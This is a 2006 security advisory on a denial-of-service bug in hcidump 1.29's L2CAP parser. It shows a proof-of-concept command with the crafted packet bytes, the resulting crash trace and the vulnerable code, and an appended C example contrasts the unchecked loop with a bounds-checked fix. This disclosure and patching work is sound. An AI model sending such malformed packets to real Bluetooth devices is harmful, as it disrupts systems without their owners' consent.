[ Secuobs - Advisory ] Bluetooth : DoS on hcidump 1.29 + PoC

2006-02-07T00:00:00
ID SECURITYVULNS:DOC:11322
Type securityvulns
Reporter Securityvulns
Modified 2006-02-07T00:00:00

Description

[Software affected] hcidump

[Version] 1.29 (other versions may also be affected)

[Impact] Denial of Service (further impact not ruled out)

[Credits] Pierre Betouin - pierre.betouin@infratech.fr - Bug found with the BSS v0.6 GPL fuzzer (Bluetooth Stack Smasher)

BSS can be downloaded from http://www.secuobs.com/news/05022006-bluetooth10.shtml

[Vendor] Notified

[Original advisory]

English: http://www.secuobs.com/news/05022006-bluetooth9.shtml#english
French:  http://www.secuobs.com/news/05022006-bluetooth9.shtml#french

[PoC] Download from http://www.secuobs.com/news/05022006-bluetooth8.shtml

[PoC usage]

./hcidump-crash 00:80:09:XX:XX:XX

L2CAP packet sent (15) Buffer: 08 01 0B 00 41 41 41 41 41 41 41 41 41 41 41

hcidump

HCI sniffer - Bluetooth packet analyzer ver 1.29
device: hci0 snap_len: 1028 filter: 0xffffffff
< HCI Command: Create Connection (0x01|0x0005) plen 13
> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Connect Complete (0x03) plen 11
< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
< ACL data: handle 41 flags 0x02 dlen 19
    L2CAP(s): debug : code=8 Echo req: dlen 12
    L2CAP(s): debug : code=0 code 0x00 ident 0 len 0
    (...)
    L2CAP(s): debug : code=0 code 0x00 ident 0 len 0
segmentation fault

[Affected code location] l2cap.c

[Affected code]

while (frm->len >= L2CAP_CMD_HDR_SIZE) {
    l2cap_cmd_hdr *hdr = frm->ptr;

    frm->ptr += L2CAP_CMD_HDR_SIZE;
    frm->len -= L2CAP_CMD_HDR_SIZE;

    if (!p_filter(FILT_L2CAP)) {
        p_indent(level, frm);
        printf("L2CAP(s): ");
    }

    switch (hdr->code) {
    (...)
    default:
        if (p_filter(FILT_L2CAP))
            break;
        printf("code 0x%2.2x ident %d len %d\n",
            hdr->code, hdr->ident, btohs(hdr->len));
        raw_dump(level, frm);
    }

    /* hdr->len comes straight from the packet and is never compared with
       frm->len: a value larger than the bytes remaining drives frm->ptr past
       the end of the frame, and the loop keeps decoding empty "code 0x00"
       commands until the read that segfaults in the trace above. */
    frm->ptr += btohs(hdr->len);
    frm->len -= btohs(hdr->len);
}
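To make the length handling concrete, the following is an added C example and not hcidump's own code. It uses a constructed stand-in for hcidump's struct frame (an assumption, not the real definition), a loop that mirrors the unchecked walk above but reports the out-of-bounds read as a status instead of crashing, and a bounds-checked variant that validates the command length before advancing. Both are run over constructed sample packets: a well-formed Echo request and one whose length field exceeds the bytes that follow it.

```c
#include <stdint.h>
#include <stdio.h>

#define L2CAP_CMD_HDR_SIZE 4   /* code(1) ident(1) len(2, little-endian) */

/* Outcome of walking the signalling commands in one L2CAP frame. */
enum walk_status {
    WALK_OK = 0,         /* every command fitted inside the buffer */
    WALK_OOB_READ = 1,   /* the unchecked loop would read past the buffer (the crash above) */
    WALK_MALFORMED = 2   /* the checked loop rejected a length field larger than what remains */
};

struct walk_result {
    enum walk_status status;
    unsigned ncmd;       /* command headers consumed before stopping */
    uint32_t len_left;   /* what the parser believes remains (frm->len) when it stops */
};

/* Constructed stand-in for the parts of hcidump's struct frame that matter here
 * (assumption: the real struct is not reproduced). Offsets replace raw pointers
 * so that an overrun can be detected instead of dereferenced. */
struct frame {
    const uint8_t *data;   /* start of the signalling payload */
    uint32_t data_len;     /* bytes really present in the buffer */
    uint32_t pos;          /* parse offset; stands in for frm->ptr */
    uint32_t len;          /* bytes the parser believes remain; stands in for frm->len */
};

/* Little-endian 16-bit read, standing in for btohs(hdr->len). */
static uint16_t le16(const uint8_t *p)
{
    return (uint16_t)(p[0] | (p[1] << 8));
}

/* Mirrors the vulnerable loop: the command length is trusted without comparing it
 * to frm.len. Where hcidump would read past the buffer, this stops and reports. */
struct walk_result walk_unchecked(const uint8_t *buf, uint32_t buflen)
{
    struct frame frm = { buf, buflen, 0, buflen };
    struct walk_result r = { WALK_OK, 0, 0 };

    while (frm.len >= L2CAP_CMD_HDR_SIZE) {
        if (frm.pos + L2CAP_CMD_HDR_SIZE > frm.data_len) {   /* header lies outside the buffer */
            r.status = WALK_OOB_READ;
            break;
        }
        uint16_t cmd_len = le16(frm.data + frm.pos + 2);
        frm.pos += L2CAP_CMD_HDR_SIZE;
        frm.len -= L2CAP_CMD_HDR_SIZE;
        r.ncmd++;

        /* The vulnerable step: no check that cmd_len <= frm.len, so the unsigned
         * subtraction wraps and the loop continues with a huge frm.len. */
        frm.pos += cmd_len;
        frm.len -= cmd_len;
    }
    r.len_left = frm.len;
    return r;
}

/* Bounds-checked variant: the length field is validated against the bytes left
 * before the offset is advanced, so a malformed command ends the walk cleanly. */
struct walk_result walk_checked(const uint8_t *buf, uint32_t buflen)
{
    struct frame frm = { buf, buflen, 0, buflen };
    struct walk_result r = { WALK_OK, 0, 0 };

    while (frm.len >= L2CAP_CMD_HDR_SIZE) {
        uint16_t cmd_len = le16(frm.data + frm.pos + 2);
        frm.pos += L2CAP_CMD_HDR_SIZE;
        frm.len -= L2CAP_CMD_HDR_SIZE;
        r.ncmd++;

        if (cmd_len > frm.len) {          /* declared length exceeds what is left */
            r.status = WALK_MALFORMED;
            break;
        }
        frm.pos += cmd_len;
        frm.len -= cmd_len;
    }
    r.len_left = frm.len;
    return r;
}

int main(void)
{
    /* Constructed samples (not the advisory's PoC bytes): an Echo request carrying
     * 3 bytes, and one whose length field (12) exceeds the 11 bytes that follow. */
    static const uint8_t good[] = { 0x08, 0x01, 0x03, 0x00, 0x41, 0x41, 0x41 };
    static const uint8_t bad[]  = { 0x08, 0x01, 0x0C, 0x00, 0x41, 0x41, 0x41, 0x41,
                                    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 };
    struct walk_result g = walk_unchecked(good, sizeof good);
    struct walk_result u = walk_unchecked(bad, sizeof bad);
    struct walk_result c = walk_checked(bad, sizeof bad);

    printf("good, unchecked: status=%d cmds=%u len_left=%u\n", g.status, g.ncmd, (unsigned)g.len_left);
    printf("bad,  unchecked: status=%d cmds=%u len_left=%u\n", u.status, u.ncmd, (unsigned)u.len_left);
    printf("bad,  checked:   status=%d cmds=%u len_left=%u\n", c.status, c.ncmd, (unsigned)c.len_left);
    return 0;
}
```

On the malformed sample the unchecked walk leaves frm.len at 0xFFFFFFFF after the wrap and then tries to read a header beyond the 15 bytes present, which is the point at which the real parser dereferences unmapped memory; the checked walk stops after the first header with a malformed verdict and the remaining count still accurate.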